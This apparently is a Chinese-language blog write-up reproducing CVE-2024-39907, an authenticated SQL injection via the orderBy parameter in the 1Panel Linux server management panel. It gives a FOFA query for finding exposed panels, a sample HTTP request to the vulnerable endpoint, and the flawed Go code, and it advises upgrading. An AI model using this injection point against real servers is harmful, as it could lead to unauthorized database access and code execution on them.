1Panel服务器管理控制面板SQL注入CVE-2024-39907

0x01 产品简介

1Panel 是一款基于 Web 的 Linux 服务器管理控制面板。

0x02 漏洞描述

项目中存在大量 SQL 注入,部分注入过滤不善,导致任意文件写入,最终导致 RCE。这些 SQL 注入已在 1.10.12-tls 版本中得到解决。建议用户升级。目前尚无针对这些问题的已知解决方法。

0x03 影响版本

v1-10-10-lts

0x04 搜索语法

FOFA

1
title="1Panel"

0x05 漏洞复现

系统登录界面

image-20240731134808347

复现截图

image-20240731135330670

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /api/v1/hosts/command/search HTTP/1.1
Host: 192.168.79.167:35839
Content-Length: 82
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Origin: http://192.168.79.167:35839
Referer: http://192.168.79.167:35839/hosts/files
Accept-Encoding: gzip, deflate, br
Cookie: psession=27116fe3-e850-41ae-b556-0d1894aa0b1d
Connection: close

{"page":1,"pageSize":10,"groupID":0,"orderBy":"12","order":"ascending","name":"a"}

通过改变 orderby的num就可以知道数据表有多少列

然后拼接orderby 造成rce

关键代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
func (u *CommandService) SearchWithPage(search dto.SearchCommandWithPage) (int64, interface{}, error) {
	total, commands, err := commandRepo.Page(search.Page, search.PageSize, commandRepo.WithLikeName(search.Name), commonRepo.WithLikeName(search.Info), commonRepo.WithByGroupID(search.GroupID), commonRepo.WithOrderRuleBy(search.OrderBy, search.Order))
	if err != nil {
		return 0, nil, err
	}
	groups, _ := groupRepo.GetList(commonRepo.WithByType("command"), commonRepo.WithOrderBy("name"))
	var dtoCommands []dto.CommandInfo
	for _, command := range commands {
		var item dto.CommandInfo
		if err := copier.Copy(&item, &command); err != nil {
			return 0, nil, errors.WithMessage(constant.ErrStructTransform, err.Error())
		}
		for _, group := range groups {
			if command.GroupID == group.ID {
				item.GroupBelong = group.Name
				item.GroupID = group.ID
			}
		}
		dtoCommands = append(dtoCommands, item)
	}
	return total, dtoCommands, err
}

其中

withorderruleby 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
func (c *CommonRepo) WithOrderRuleBy(orderBy, order string) DBOption {
	switch order {
	case constant.OrderDesc:
		order = "desc"
	case constant.OrderAsc:
		order = "asc"
	default:
		orderBy = "created_at"
		order = "desc"
	}
	return func(g *gorm.DB) *gorm.DB {
		return g.Order(fmt.Sprintf("%s %s", orderBy, order))
	}
}

image-20240731140938594

但是必须要登录

image-20240731135203073

利用条件

  1. 需要登录到后台

但是既然登录到了后台就可以尝试使用其他方式进行getshell

漏洞利用poc

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /api/v1/hosts/command/search HTTP/1.1
Host: 192.168.79.167:35839
Content-Length: 82
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Origin: http://192.168.79.167:35839
Referer: http://192.168.79.167:35839/hosts/files
Accept-Encoding: gzip, deflate, br
Cookie: psession=27116fe3-e850-41ae-b556-0d1894aa0b1d
Connection: close

{"page":1,"pageSize":10,"groupID":0,"orderBy":"12","order":"ascending","name":"a"}

0x06 修复建议

更新版本

#漏洞复现
1Panel服务器管理控制面板SQL注入CVE-2024-39907
https://tsy244.github.io/2024/07/31/漏洞复现/1Panel服务器管理控制面板SQL注入CVE-2024-39907/
Author
August Rosenberg
Posted on
July 31, 2024
Licensed under